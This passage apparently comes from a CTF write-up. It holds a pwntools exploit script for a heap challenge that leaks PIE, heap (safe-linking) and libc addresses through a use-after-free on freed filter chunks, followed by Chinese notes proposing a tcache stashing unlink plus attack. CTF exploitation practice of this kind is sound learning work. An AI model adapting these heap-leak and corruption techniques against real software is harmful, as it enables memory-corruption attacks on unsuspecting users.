    choose(3)
    io.sendlineafter(b'watermark length (0~32)? ', str(size).encode())
    if size:
        io.sendafter(b'send 32 bytes for watermark\n', buf)


def reload():
    """Menu option 4: reload, sending a fresh 2016-byte PNG image."""
    choose(4)
    # io.send(b"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a" + cyclic(2016 - 8, n=8))
    io.send(build_png())


def rename():
    """Menu option 5: rename (only selects the entry; sends no data)."""
    choose(5)


def name(buf):
    """Answer the initial name prompt and parse the address printed back.

    Args:
        buf: Name to send.

    Returns:
        The hexadecimal value that follows ``": "`` in the reply, as an int.
    """
    io.recvuntil(b"What is your name?\n")
    io.sendline(buf)
    io.recvuntil(b": ")
    # The reply line carries a hex address (used by the caller as main's).
    return int(io.recvuntil(b"\n", drop=True).decode(), 16)


def leak():
    """Read the 8 bytes that follow the ``fiLT\\x80`` marker as a u64."""
    io.recvuntil(b"fiLT\x80")
    return u64(io.recv(8))


# The service prints an address after the name prompt; 0x24f5 is taken as
# main's offset inside the binary, giving the PIE base.
main_addr = name(b"aaa")
pie_addr = main_addr - 0x24f5
log.info(f"pie_addr => {hex(pie_addr)}")
# Initial image upload.
io.send(build_png())


# Fill all eight filter slots, then free them with a single delete.
for i in range(8):
    add(i, b"A"*16)
delete()
# The first run prints the stale chunk contents.
# NOTE(review): the leaked qword is presumably a safe-linking value
# (heap address >> 12), hence the shift — confirm in a debugger.
run(0, b"")
heap_base = leak() << 12
reload()
# The second run leaks a libc pointer; 0x203b20 is its offset from the libc
# base for the shipped libc.so.6 — TODO confirm.
run(0, b"")
libc.address = leak() - 0x203b20
log.info(f"libc_addr => {hex(libc.address)}\nheap_base => {hex(heap_base)}")

reload()
# Unfinished follow-up steps, kept for reference:
# delete()
# rename()
# for i in range(6):
#     add(i, b"A" * 16)
io.interactive()

还有一次 delete 和一次 reload 的机会

这里可以让同一个 chunk 同时位于 tcache 和 smallbin 中,然后打 tsu+(tcache stashing unlink plus)即可。

## AKVC

= =